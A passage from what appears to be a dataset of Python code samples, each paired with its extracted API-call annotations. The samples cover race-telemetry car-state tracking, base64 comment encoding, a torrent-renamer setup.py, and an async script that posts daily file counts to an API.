this class is used to measure a sector time or a complete lap time.
The key attr identifies a sector or lap number
"""
def __init__(self) -> None:
self.start_time = -1
self.stop_time = -1
self.duration = -1
self.best = sys.maxsize
def mark_start(self,sessionTime):
self.start_time = sessionTime
def mark_stop(self,sessionTime):
self.stop_time = sessionTime
self.duration = self.stop_time - self.start_time
return self.duration
# self.best = min(self.best,self.duration)
class CarLaptiming:
def __init__(self, num_sectors=0) -> None:
self.lap = SectionTiming()
self.sectors = [SectionTiming() for x in range(num_sectors)]
def reset(self):
pass
class CarState(Enum):
INIT = 0
RUN = 1
PIT = 2
FINISHED = 3
OUT = 4
SLOW = 5
class PitBoundaryData:
"""
@param keep_hist use at most this many entries for computation
@param min_hist build up at least this many entries before deciding about which entries to keep.
"""
def __init__(self, keep_hist=21, min_hist=3) -> None:
self.min = 0
self.max = 0
self.middle = 0
self.hist = []
self.keep_hist = keep_hist
self.min_hist = min_hist
def process(self, trackPos):
"""
process the given trackPos. while
"""
if len(self.hist) < self.keep_hist:
self.hist.append(trackPos)
self.compute_values()
return
self.hist.append(trackPos)
if len(self.hist) % 2 == 1:
self.hist.sort()
self.hist = self.hist[1:-1]
def compute_values(self):
self.min = self.hist[0]
self.max = self.hist[-1]
self.middle = self.hist[len(self.hist)>>1]
def __repr__(self) -> str:
tmp = ", ".join([f"{e}" for e in self.hist] )
return f'PitBoundaryData min: {self.min} max: {self.max} avg: {self.middle} hist: {tmp}'
class PitBoundaries():
def __init__(self) -> None:
self.pit_entry_boundary = PitBoundaryData()
self.pit_exit_boundary = PitBoundaryData()
def process_entry(self, trackPos):
self.pit_entry_boundary.process(trackPos)
def process_exit(self, trackPos):
self.pit_exit_boundary.process(trackPos)
def __repr__(self) -> str:
return f'PitEntry: {self.pit_entry_boundary}\nPitExit: {self.pit_exit_boundary}\n'
class CarData:
"""
this class holds data about a car during a race.
No data history is stored here.
"""
def __init__(self,carIdx=None, manifest=CarsManifest,num_sectors=0, driver_proc=None, pit_boundaries=None) -> None:
self.logger = logging.getLogger(self.__class__.__name__)
for item in manifest:
self.__setattr__(item, "")
self.current_best = sys.maxsize
self.carIdx = carIdx
self.manifest = manifest
self.slow_marker = False
self.current_sector = -1
self.stintLap = 0
self.pitstops = 0
self.driver_proc = driver_proc
self.lap_timings = CarLaptiming(num_sectors=num_sectors)
self.pit_boundaries = pit_boundaries
self.marker_info = (-1,"") # lapNo/marker
self.processState = CarState.INIT
self.stateSwitch = {
CarState.INIT: self.state_init,
CarState.RUN: self.state_racing,
CarState.SLOW: self.state_racing_slow,
CarState.PIT: self.state_pitting,
CarState.FINISHED: self.state_finished,
CarState.OUT: self.state_out_of_race,
}
self.postProcessStateSwitch = {
CarState.INIT: self.state_post_process_noop,
CarState.RUN: self.state_post_process_run,
CarState.SLOW: self.state_post_process_slow,
CarState.PIT: self.state_post_process_noop,
CarState.FINISHED: self.state_post_process_noop,
CarState.OUT: self.state_post_process_noop,
}
def state_init(self, ir):
self.copy_standards(ir)
self.trackPos = gate(ir['CarIdxLapDistPct'][self.carIdx])
self.pos = ir['CarIdxPosition'][self.carIdx]
self.pic = ir['CarIdxClassPosition'][self.carIdx]
self.lap = ir['CarIdxLap'][self.carIdx]
self.lc = ir['CarIdxLapCompleted'][self.carIdx]
if ir['CarIdxLapDistPct'][self.carIdx] == -1:
self.state= "OUT"
self.processState = CarState.OUT
return
if ir['CarIdxOnPitRoad'][self.carIdx]:
self.copy_when_racing(ir)
self.state = "PIT"
self.processState = CarState.PIT
self.stintLap = 0
else:
self.copy_when_racing(ir)
self.state = "RUN"
self.processState = CarState.RUN
def state_racing(self, ir):
self.copy_standards(ir)
if ir['CarIdxLapDistPct'][self.carIdx] == -1:
self.state= "OUT"
self.processState = CarState.OUT
return
if ir['CarIdxOnPitRoad'][self.carIdx] == False and ir['CarIdxLapCompleted'][self.carIdx]>self.lc:
self.stintLap += 1
self.copy_when_racing(ir)
if ir['CarIdxOnPitRoad'][self.carIdx]:
self.state = "PIT"
self.pitstops += 1
self.processState = CarState.PIT
self.pit_boundaries.process_entry(ir['CarIdxLapDistPct'][self.carIdx])
def state_racing_slow(self, ir):
self.copy_standards(ir)
if ir['CarIdxLapDistPct'][self.carIdx] == -1:
self.state= "OUT"
self.processState = CarState.OUT
return
self.copy_when_racing(ir)
if ir['CarIdxOnPitRoad'][self.carIdx]:
self.state = "PIT"
self.pitstops += 1
self.processState = CarState.PIT
self.pit_boundaries.process_entry(ir['CarIdxLapDistPct'][self.carIdx])
def state_pitting(self, ir):
self.copy_standards(ir)
if ir['CarIdxLapDistPct'][self.carIdx] == -1:
self.state= "OUT"
self.processState = CarState.OUT
return
self.copy_when_racing(ir)
if ir['CarIdxOnPitRoad'][self.carIdx] == 0:
self.state = "RUN"
self.stintLap = 1
self.processState = CarState.RUN
self.pit_boundaries.process_exit(ir['CarIdxLapDistPct'][self.carIdx])
def state_finished(self, ir):
# self.logger.debug(f"carIdx {self.carIdx} finished the race.")
self.copy_standards(ir)
def state_out_of_race(self, ir):
self.copy_standards(ir)
# this may happen after resets or tow to pit road. if not on the pit road it may just be a short connection issue.
if ir['CarIdxOnPitRoad'][self.carIdx]:
self.state = "PIT"
self.processState = CarState.PIT
else:
if ir['CarIdxLapDistPct'][self.carIdx] > -1:
self.state = "RUN"
self.processState = CarState.RUN
def process(self, ir):
# handle processing depending on current state
self.stateSwitch[self.processState](ir)
#
# handle post processing after times, speed, delta are computed
#
def state_post_process_noop(self, msg_proc=None):
pass # do nothing by design
def state_post_process_run(self, msg_proc):
if self.speed > 0 and self.speed < CAR_SLOW_SPEED :
self.state = 'SLOW'
self.processState = CarState.SLOW
msg_proc.add_car_slow(self.carIdx,self.speed)
def state_post_process_slow(self, msg_proc):
if self.speed > CAR_SLOW_SPEED:
if self.processState == CarState.SLOW:
self.processState = CarState.RUN
self.state = 'RUN'
else:
self.logger.warn(f"should not happen. carNum {self.driver_proc.car_number(self.carIdx)} procState: {self.processState} state: {self.state}")
def post_process(self, msg_proc):
# handles post processing of special cases.
self.postProcessStateSwitch[self.processState](msg_proc)
def copy_standards(self,ir):
self.carNum = self.driver_proc.car_number(self.carIdx)
self.userName = self.driver_proc.user_name(self.carIdx)
self.teamName = self.driver_proc.team_name(self.carIdx)
self.carClass = self.driver_proc.car_class(self.carIdx)
self.car = self.driver_proc.car(self.carIdx)
def copy_when_racing(self, ir):
self.trackPos = gate(ir['CarIdxLapDistPct'][self.carIdx])
self.pos = ir['CarIdxPosition'][self.carIdx]
self.pic = ir['CarIdxClassPosition'][self.carIdx]
self.lap = ir['CarIdxLap'][self.carIdx]
self.lc = ir['CarIdxLapCompleted'][self.carIdx]
self.dist = 0
self.interval = 0
def manifest_output(self):
return [self.__getattribute__(x) for x in self.manifest]
|
[
"logging.getLogger",
"racelogger.util.utils.gate"
] |
[((3347, 3389), 'logging.getLogger', 'logging.getLogger', (['self.__class__.__name__'], {}), '(self.__class__.__name__)\n', (3364, 3389), False, 'import logging\n'), ((4729, 4770), 'racelogger.util.utils.gate', 'gate', (["ir['CarIdxLapDistPct'][self.carIdx]"], {}), "(ir['CarIdxLapDistPct'][self.carIdx])\n", (4733, 4770), False, 'from racelogger.util.utils import gate\n'), ((9178, 9219), 'racelogger.util.utils.gate', 'gate', (["ir['CarIdxLapDistPct'][self.carIdx]"], {}), "(ir['CarIdxLapDistPct'][self.carIdx])\n", (9182, 9219), False, 'from racelogger.util.utils import gate\n')]
|
from base64 import b64encode as _e, b64decode as _d
def encode(text: str, timestamp: float) -> str:
"""Encode comment into base64 string.
:param text: The text of the comment.
:param timestamp: The timestamp of the comment.
:return: The base64-encoded comment.
"""
return '%s:%s' % (_encode(text), _encode(timestamp))
def decode(comment: str) -> tuple:
"""Decode base64 string into comment.
:param comment: The base64-encoded comment.
:return: The decoded comment (text, timestamp).
"""
text, timestamp = comment.split(':', 1)
return _decode(text), _decode(timestamp)
def encode_many(comments: list) -> str:
"""Encode many comments into base64 string.
:param comments: The source list of comments.
:return: The base64-encoded list of comments.
"""
return ';'.join(encode(text, timestamp) for text, timestamp in comments)
def decode_many(comments: str) -> list:
"""Decode base64 string into many comments.
:param comments: The base64-encoded list of comments.
:return: The decoded list o comments [(text, timestamp)].
"""
return [decode(comment) for comment in comments.split(';')]
def _encode(src: str or float) -> str:
return _e(str(src).encode()).decode()
def _decode(src: str) -> str or float:
decoded = _d(src).decode()
try:
return float(decoded)
except ValueError:
return decoded
|
[
"base64.b64decode"
] |
[((1251, 1258), 'base64.b64decode', '_d', (['src'], {}), '(src)\n', (1253, 1258), True, 'from base64 import b64encode as _e, b64decode as _d\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import pypandoc
import os
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
with open('requirements.txt') as requirements:
install_requires = requirements.read().splitlines()
try:
long_description = pypandoc.convert('README.md', 'rst')
long_description = long_description.replace("\r","")
except OSError:
print("Pandoc not found. Long_description conversion failure.")
import io
with io.open('README.md', encoding="utf-8") as f:
long_description = f.read()
setup(
name='MovieSerieTorrent',
version='1.0.16',
packages=find_packages(),
install_requires=install_requires,
author="<NAME>",
author_email="<EMAIL>",
description="Parser and Renamer for torrents files (Movies and series)",
long_description= long_description,
include_package_data=True,
url='https://github.com/JonathanPetit/Parser-Renamer',
license= 'MIT',
keywords = 'parser renamer formatting python torrents torrent files file movie serie movies series',
classifiers=[
"Programming Language :: Python",
"Natural Language :: French",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
],
)
|
[
"os.path.abspath",
"pypandoc.convert",
"setuptools.find_packages",
"io.open"
] |
[((328, 364), 'pypandoc.convert', 'pypandoc.convert', (['"""README.md"""', '"""rst"""'], {}), "('README.md', 'rst')\n", (344, 364), False, 'import pypandoc\n'), ((683, 698), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (696, 698), False, 'from setuptools import setup, find_packages\n'), ((156, 181), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (171, 181), False, 'import os\n'), ((529, 567), 'io.open', 'io.open', (['"""README.md"""'], {'encoding': '"""utf-8"""'}), "('README.md', encoding='utf-8')\n", (536, 567), False, 'import io\n')]
|
# -*- coding: utf-8 -*-
import argparse, datetime, glob, json, logging, os, pprint, random, time
from functools import partial
from operator import itemgetter
from typing import Iterator, List, Optional
import asks, trio
logging.basicConfig(
# filename=settings.LOG_PATH,
level=logging.DEBUG,
format='[%(asctime)s] %(levelname)s [%(module)s-%(funcName)s()::%(lineno)d] %(message)s',
datefmt='%d/%b/%Y %H:%M:%S' )
log = logging.getLogger(__name__)
class Initializer:
""" Creates initial tracker. """
def __init__( self ):
self.SOURCE_DIR_PATH = os.environ['ANXEOD__SOURCE_DIR_PATH']
self.DESTINATION_PATH = os.environ['ANXEOD__TRACKER_A_PATH']
self.filepath_tracker = []
self.start = datetime.datetime.now()
self.files: list = glob.glob( f'{self.SOURCE_DIR_PATH}/*.dat' )
def initialize_tracker( self ):
""" Manages build.
Called by main() """
log.debug( f'len(files), `{len(self.files)}`' )
for path in self.files:
self.build_initial_tracker( path )
sorted_filepath_tracker = self.build_sorted_tracker()
time_taken = str( datetime.datetime.now() - self.start )
log.debug( f'time_taken, `{time_taken}`' )
with open( self.DESTINATION_PATH, 'w' ) as f:
jsn: str = json.dumps( sorted_filepath_tracker, sort_keys=True, indent=2 )
f.write( jsn )
return
def build_initial_tracker( self, path: str ) -> None:
""" Creates initial dict of file-info & appends it to self.filepath_tracker list.
Called by initialize_tracker() """
file_timestamp: float = os.path.getmtime( path )
timestamp: datetime.datetime = datetime.datetime.fromtimestamp( file_timestamp )
info: dict = { 'path': path, 'timestamp': timestamp, 'updated': None }
self.filepath_tracker.append( info )
return
def build_sorted_tracker( self ) -> list:
""" Sorts initial tracker & updates timestamp-type.
Called by initialize_tracker() """
sorted_filepath_tracker: list = sorted( self.filepath_tracker, key=itemgetter('timestamp') )
for entry in sorted_filepath_tracker:
entry['timestamp'] = str( entry['timestamp'] ) # needs for json dump
log.debug( f'len(sorted_filepath_tracker), `{len(sorted_filepath_tracker)}`' )
return sorted_filepath_tracker
## end class Initializer
class Counter:
""" Creates count-tracker. """
def __init__( self ):
self.INITIAL_TRACKER_PATH = os.environ['ANXEOD__TRACKER_A_PATH']
self.COUNT_TRACKER_PATH = os.environ['ANXEOD__TRACKER_B_PATH']
self.date_dct = {}
self.start = datetime.datetime.now()
# def build_count_tracker( self ) -> None:
# """
# Flow...
# load file
# create new count_tracker file
# create a list of date-dicts by going through all entries
# for each entry
# determin the proper date
# determine the _kind_ of count
# determine the count
# update the count-tracker file
# """
# file_entries: List[dict] = self.load_file_list()
# self.initialize_count_tracker()
# self.make_date_dict( file_entries )
# for entry in file_entries:
# entry_date: datetime.date = datetime.datetime.strptime( entry['timestamp'], '%Y-%m-%d %H:%M:%S' ).date()
# count_type: str = self.parse_type( entry['path'] )
# count: int = self.parse_count( entry['path'] )
# self.date_dct[str(entry_date)][count_type] = count
# self.update_count_tracker()
# return
def build_count_tracker( self ) -> None:
"""
Flow...
load file
create new count_tracker file
create a list of date-dicts by going through all entries
for each entry
determin the proper date
determine the _kind_ of count
determine the count
update the count-tracker file
"""
file_entries: List[dict] = self.load_file_list()
self.initialize_count_tracker()
self.make_date_dict( file_entries )
for entry in file_entries:
entry_date: datetime.date = datetime.datetime.strptime( entry['timestamp'], '%Y-%m-%d %H:%M:%S' ).date()
count_type: str = self.parse_type( entry['path'] )
count: int = self.parse_count( entry['path'] )
self.update_date_dct( entry_date, count_type, count ) # handles multiple files in a given day
# self.date_dct[str(entry_date)][count_type] = count
self.update_count_tracker()
return
def load_file_list( self ) -> List[dict]:
""" Loads tracker-a.
Called by build_count_tracker() """
with open( self.INITIAL_TRACKER_PATH, 'r' ) as f:
entries_jsn: str = f.read()
entries: list = json.loads( entries_jsn )
return entries
def initialize_count_tracker( self ) -> None:
""" Saves empty list file.
Called by build_count_tracker() """
count_tracker: list = []
empty_count_tracker_jsn: str = json.dumps( count_tracker )
with open( self.COUNT_TRACKER_PATH, 'w' ) as f:
f.write( empty_count_tracker_jsn )
return
def make_date_dict( self, file_entries: List[dict] ) -> None:
""" Populates self.date_dct.
Called by build_count_tracker() """
for entry in file_entries:
timestamp: str = entry['timestamp']
date_obj: datetime.date = datetime.datetime.strptime( timestamp, '%Y-%m-%d %H:%M:%S' ).date()
date_str: str = str( date_obj )
self.date_dct[date_str] = {}
log.debug( f'self.date_dct, ```{pprint.pformat(self.date_dct)[0:100]}```' )
log.debug( f'num-dates, `{len(self.date_dct.keys())}`' )
return
def parse_type( self, path: str ) -> str:
""" Parses count type.
Called by build_count_tracker() """
count_type: str = ''
if 'QHACS' in path:
count_type = 'hay_accessions'
elif 'QSACS' in path:
count_type = 'non-hay_accessions'
elif 'QHREF' in path:
count_type = 'hay_refiles'
elif 'QSREF' in path:
count_type = 'non-hay_refiles'
else:
raise Exception( 'unhandled count-type' )
return count_type
def parse_count( self, path: str ) -> int:
""" Loads file and parses count.
Called by build_count_tracker() """
with open( path, 'r' ) as f:
data = f.readlines()
count = len( data )
return count
def update_date_dct( self, entry_date, count_type, count ) -> None:
if count_type in self.date_dct[str(entry_date)].keys():
log.info( f'existing count of `{count}` already found for date, ```{entry_date}```; count_type, `{count_type}`' )
self.date_dct[str(entry_date)][count_type] += count
else:
self.date_dct[str(entry_date)][count_type] = count
return
def update_count_tracker( self ) -> None:
""" Writes file.
Called by build_count_tracker() """
jsn: str = json.dumps( self.date_dct, sort_keys=True, indent=2 )
with open( self.COUNT_TRACKER_PATH, 'w' ) as f:
f.write( jsn )
log.debug( f'time-taken, `{str( datetime.datetime.now() - self.start )}`' )
return
## end class Counter
class Updater:
""" Updates db. """
def __init__( self ):
self.COUNT_TRACKER_PATH = os.environ['ANXEOD__TRACKER_B_PATH']
self.UPDATED_COUNT_TRACKER_PATH = os.environ['ANXEOD__TRACKER_C_PATH']
self.API_UPDATER_URL = os.environ['ANXEOD__ANNEX_COUNTS_API_UPDATER_URL']
self.API_AUTHKEY = os.environ['ANXEOD__ANNEX_COUNTS_API_AUTHKEY']
self.updated_count_tracker_dct = {}
self.nursery = None
self.throttle: float = 1.0
self.mutex = None
self.continue_worker_flag = True
self.start = datetime.datetime.now()
self.sanity_check_limit: int = 3
def update_db( self ) -> None:
""" Calls concurrency-manager function.
Called by main()
Credit: <https://stackoverflow.com/questions/51250706/combining-semaphore-and-time-limiting-in-python-trio-with-asks-http-request>
"""
self.setup_final_tracker()
trio.run( partial(self.manage_concurrent_updates, n_workers=3) )
log.debug( f'total time taken, `{str( datetime.datetime.now() - self.start )}` seconds' )
return
def setup_final_tracker( self ) -> None:
""" Initializes final tracker if it doesn't exist.
Called by update_db() """
try:
with open( self.UPDATED_COUNT_TRACKER_PATH, 'r' ) as f:
self.updated_count_tracker_dct = json.loads( f.read() )
log.debug( 'existing updated_count_tracker found and loaded' )
except Exception as e:
log.debug( f'updated_count_tracker _not_ found, exception was ```{e}```, so creating it' )
self.create_final_tracker()
return
def create_final_tracker( self ) -> None:
""" Writes final-tracker-file.
Called by setup_final_tracker() """
with open( self.COUNT_TRACKER_PATH, 'r' ) as f:
count_tracker_dct = json.loads( f.read() )
for date_key, count_info in count_tracker_dct.items():
count_info['updated'] = None
actual_count_info_keys = list( count_info.keys() )
for required_key in ['hay_accessions', 'hay_refiles', 'non-hay_accessions', 'non-hay_refiles']:
if required_key not in actual_count_info_keys:
count_info[required_key] = 0
self.updated_count_tracker_dct = count_tracker_dct
with open( self.UPDATED_COUNT_TRACKER_PATH, 'w' ) as f:
f.write( json.dumps(self.updated_count_tracker_dct, sort_keys=True, indent=2) )
return
async def manage_concurrent_updates(self, n_workers: int ):
""" Manages asynchronous processing of db updates.
Called by update_db() """
async with trio.open_nursery() as nursery:
self.nursery = nursery
for _ in range(n_workers):
self.nursery.start_soon( self.run_worker_job )
async def run_worker_job( self ) -> None:
""" Manages worker job.
Called by manage_concurrent_updates() """
log.debug( 'function starting' )
temp_counter = 0
while self.continue_worker_flag is True:
temp_counter += 1
await self.get_mutex().acquire()
log.debug( 'mutex acquired to start job' )
self.nursery.start_soon( self.tick )
entry: Optional[dict] = self.grab_next_entry()
if entry is None:
log.info( 'no more entries -- cancel' )
self.continue_worker_flag = False
elif temp_counter >= self.sanity_check_limit:
log.info( f'temp_counter, `{temp_counter}`, so will stop' )
self.continue_worker_flag = False
else:
# await asks.get( 'https://httpbin.org/delay/4' )
await self.post_update( entry )
log.debug( 'url processed' )
self.save_updated_tracker()
return
def get_mutex( self ):
if self.mutex == None:
self.mutex = trio.Semaphore(1)
else:
pass
log.debug( 'returning mutex' )
return self.mutex
async def tick( self ) -> None:
await trio.sleep( self.throttle )
self.mutex.release()
def grab_next_entry( self ) -> Optional[dict]:
""" Finds and returns next entry to process.
Called by run_worker_job() """
key_entry: Optional[dict] = None
for key, count_info in self.updated_count_tracker_dct.items():
# log.debug( f'current key, `{key}`; current count_info, ```{count_info}```' )
if count_info['updated'] is None:
log.debug( 'found next entry to process' )
key_entry = { key: count_info }
count_info['updated'] = 'in_process'
break
log.debug( f'returning key_entry, ```{key_entry}```' )
# log.debug( f'self.updated_count_tracker_dct, ```{pprint.pformat(self.updated_count_tracker_dct)[0:1000]}```' )
return key_entry
async def post_update( self, entry: dict ):
""" Runs the post.
Called by run_worker_job() """
params: dict = self.prep_params( entry )
params['auth_key'] = self.API_AUTHKEY
temp_process_id = random.randint( 1111, 9999 )
log.debug( f'`{temp_process_id}` -- about to hit url' )
resp = await asks.post( self.API_UPDATER_URL, data=params, timeout=10 )
# resp = await asks.get( 'https://httpbin.org/delay/4' )
log.debug( f'`{temp_process_id}` -- url response received, ```{resp.content}```' )
date_key, other = list(entry.items())[0]
if resp.status_code == 200:
self.updated_count_tracker_dct[date_key]['updated'] = str( datetime.datetime.now() )
else:
self.updated_count_tracker_dct[date_key]['updated'] = 'PROBLEM'
log.debug( f'status_code, `{resp.status_code}`; type(status_code), `{type(resp.status_code)}`; content, ```{resp.content}```' )
return
def prep_params( self, entry: dict ):
""" Preps post params.
Called by post_update() """
( date_key, info ) = list( entry.items() )[0] # date_key: str, info: dict
log.debug( f'info, ```{info}```' )
param_dct = {
'date': date_key,
'hay_accessions': info['hay_accessions'],
'hay_refiles': info['hay_refiles'],
'non_hay_accessions': info['non-hay_accessions'],
'non_hay_refiles': info['non-hay_refiles'],
}
log.debug( f'param_dct, ```{param_dct}```' )
return param_dct
def save_updated_tracker( self ) -> None:
""" Writes dct attribute.
Called by run_worker_job() """
with open( self.UPDATED_COUNT_TRACKER_PATH, 'w' ) as f:
f.write( json.dumps(self.updated_count_tracker_dct, sort_keys=True, indent=2) )
log.debug( 'updated tracker saved' )
return
## end class Updater
# --------------------
# caller
# --------------------
def parse_args():
""" Parses arguments when module called via __main__ """
parser = argparse.ArgumentParser( description='Required: function-name.' )
parser.add_argument( '--function', '-f', help='function name required', required=True )
args_dict = vars( parser.parse_args() )
return args_dict
def call_function( function_name: str ) -> None:
""" Safely calls function named via input string to __main__
Credit: <https://stackoverflow.com/a/51456172> """
log.debug( f'function_name, ```{function_name}```' )
initializer = Initializer()
counter = Counter()
updater = Updater()
safe_dispatcher = {
'initialize_tracker': initializer.initialize_tracker,
'build_counts': counter.build_count_tracker,
'update_db': updater.update_db
}
try:
safe_dispatcher[function_name]()
except:
raise Exception( 'invalid function' )
return
if __name__ == '__main__':
args: dict = parse_args()
log.debug( f'args, ```{args}```' )
submitted_function: str = args['function']
call_function( submitted_function )
# --------------------
# trio experimentation from: <https://stackoverflow.com/questions/51250706/combining-semaphore-and-time-limiting-in-python-trio-with-asks-http-request>
# --------------------
# (neither of the two methods below work with requests)
# # --------------------
# # works...
# # --------------------
# import pprint
# from functools import partial
# from typing import List, Iterator
# import asks
# import trio
# links: List[str] = [
# 'https://httpbin.org/delay/7',
# 'https://httpbin.org/delay/6',
# 'https://httpbin.org/delay/3'
# ] * 2
# responses = []
# async def fetch_urls(urls: Iterator, responses: list, n_workers: int, throttle: int ):
# # Using binary `trio.Semaphore` to be able
# # to release it from a separate task.
# mutex = trio.Semaphore(1)
# async def tick():
# await trio.sleep(throttle)
# mutex.release()
# async def worker():
# for url in urls:
# await mutex.acquire()
# print( f'[{round(trio.current_time(), 2)}] Start loading link: {url}' )
# nursery.start_soon(tick)
# response = await asks.get(url)
# responses.append(response)
# async with trio.open_nursery() as nursery:
# for _ in range(n_workers):
# nursery.start_soon(worker)
# # trio.run( fetch_urls, iter(links), responses, 5, 1 ) # works
# # trio.run( fetch_urls, urls=iter(links), responses=responses, n_workers=5, throttle=1 ) # doesn't work
# trio.run( partial(fetch_urls, urls=iter(links), responses=responses, n_workers=5, throttle=1) ) # works
# print( f'responses, ```{pprint.pformat(responses)}```' )
# --------------------
# works...
# --------------------
# from typing import List, Iterator
# import asks
# import trio
# asks.init('trio')
# links: List[str] = [
# 'https://httpbin.org/delay/4',
# 'https://httpbin.org/delay/3',
# 'https://httpbin.org/delay/1'
# ] * 3
# async def fetch_urls(urls: List[str], number_workers: int, throttle_rate: float):
# async def token_issuer(token_sender: trio.abc.SendChannel, number_tokens: int):
# async with token_sender:
# for _ in range(number_tokens):
# await token_sender.send(None)
# await trio.sleep(1 / throttle_rate)
# async def worker(url_iterator: Iterator, token_receiver: trio.abc.ReceiveChannel):
# async with token_receiver:
# for url in url_iterator:
# await token_receiver.receive()
# print(f'[{round(trio.current_time(), 2)}] Start loading link: {url}')
# response = await asks.get(url)
# # print(f'[{round(trio.current_time(), 2)}] Loaded link: {url}')
# responses.append(response)
# responses = []
# url_iterator = iter(urls)
# token_send_channel, token_receive_channel = trio.open_memory_channel(0)
# async with trio.open_nursery() as nursery:
# async with token_receive_channel:
# nursery.start_soon(token_issuer, token_send_channel.clone(), len(urls))
# for _ in range(number_workers):
# nursery.start_soon(worker, url_iterator, token_receive_channel.clone())
# return responses
# responses = trio.run(fetch_urls, links, 5, 1.)
|
[
"functools.partial",
"trio.open_nursery",
"trio.Semaphore",
"argparse.ArgumentParser",
"logging.basicConfig",
"random.randint",
"json.loads",
"pprint.pformat",
"datetime.datetime.fromtimestamp",
"json.dumps",
"datetime.datetime.strptime",
"asks.post",
"os.path.getmtime",
"glob.glob",
"operator.itemgetter",
"datetime.datetime.now",
"trio.sleep",
"logging.getLogger"
] |
[((225, 394), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.DEBUG', 'format': '"""[%(asctime)s] %(levelname)s [%(module)s-%(funcName)s()::%(lineno)d] %(message)s"""', 'datefmt': '"""%d/%b/%Y %H:%M:%S"""'}), "(level=logging.DEBUG, format=\n '[%(asctime)s] %(levelname)s [%(module)s-%(funcName)s()::%(lineno)d] %(message)s'\n , datefmt='%d/%b/%Y %H:%M:%S')\n", (244, 394), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((439, 466), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (456, 466), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((14734, 14797), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Required: function-name."""'}), "(description='Required: function-name.')\n", (14757, 14797), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((746, 769), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (767, 769), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((797, 839), 'glob.glob', 'glob.glob', (['f"""{self.SOURCE_DIR_PATH}/*.dat"""'], {}), "(f'{self.SOURCE_DIR_PATH}/*.dat')\n", (806, 839), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((1663, 1685), 'os.path.getmtime', 'os.path.getmtime', (['path'], {}), '(path)\n', (1679, 1685), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((1727, 1774), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['file_timestamp'], {}), '(file_timestamp)\n', (1758, 1774), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((2726, 2749), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2747, 2749), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((5232, 5257), 'json.dumps', 'json.dumps', (['count_tracker'], {}), '(count_tracker)\n', (5242, 5257), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((7319, 7370), 'json.dumps', 'json.dumps', (['self.date_dct'], {'sort_keys': '(True)', 'indent': '(2)'}), '(self.date_dct, sort_keys=True, indent=2)\n', (7329, 7370), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((8150, 8173), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8171, 8173), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((12861, 12887), 'random.randint', 'random.randint', (['(1111)', '(9999)'], {}), '(1111, 9999)\n', (12875, 12887), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((1329, 1390), 'json.dumps', 'json.dumps', (['sorted_filepath_tracker'], {'sort_keys': '(True)', 'indent': '(2)'}), '(sorted_filepath_tracker, sort_keys=True, indent=2)\n', (1339, 1390), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((4977, 5000), 'json.loads', 'json.loads', (['entries_jsn'], {}), '(entries_jsn)\n', (4987, 5000), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((8540, 8592), 'functools.partial', 'partial', (['self.manage_concurrent_updates'], {'n_workers': '(3)'}), '(self.manage_concurrent_updates, n_workers=3)\n', (8547, 8592), False, 'from functools import partial\n'), ((10315, 10334), 'trio.open_nursery', 'trio.open_nursery', ([], {}), '()\n', (10332, 10334), False, 'import asks, trio\n'), ((11610, 11627), 'trio.Semaphore', 'trio.Semaphore', (['(1)'], {}), '(1)\n', (11624, 11627), False, 'import asks, trio\n'), ((11775, 11800), 'trio.sleep', 'trio.sleep', (['self.throttle'], {}), '(self.throttle)\n', (11785, 11800), False, 'import asks, trio\n'), ((12975, 13031), 'asks.post', 'asks.post', (['self.API_UPDATER_URL'], {'data': 'params', 'timeout': '(10)'}), '(self.API_UPDATER_URL, data=params, timeout=10)\n', (12984, 13031), False, 'import asks, trio\n'), ((1162, 1185), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1183, 1185), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((2145, 2168), 'operator.itemgetter', 'itemgetter', (['"""timestamp"""'], {}), "('timestamp')\n", (2155, 2168), False, 'from operator import itemgetter\n'), ((10048, 10116), 'json.dumps', 'json.dumps', (['self.updated_count_tracker_dct'], {'sort_keys': '(True)', 'indent': '(2)'}), '(self.updated_count_tracker_dct, sort_keys=True, indent=2)\n', (10058, 10116), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((13346, 13369), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (13367, 13369), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((14426, 14494), 'json.dumps', 'json.dumps', (['self.updated_count_tracker_dct'], {'sort_keys': '(True)', 'indent': '(2)'}), '(self.updated_count_tracker_dct, sort_keys=True, indent=2)\n', (14436, 14494), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((4305, 4372), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (["entry['timestamp']", '"""%Y-%m-%d %H:%M:%S"""'], {}), "(entry['timestamp'], '%Y-%m-%d %H:%M:%S')\n", (4331, 4372), 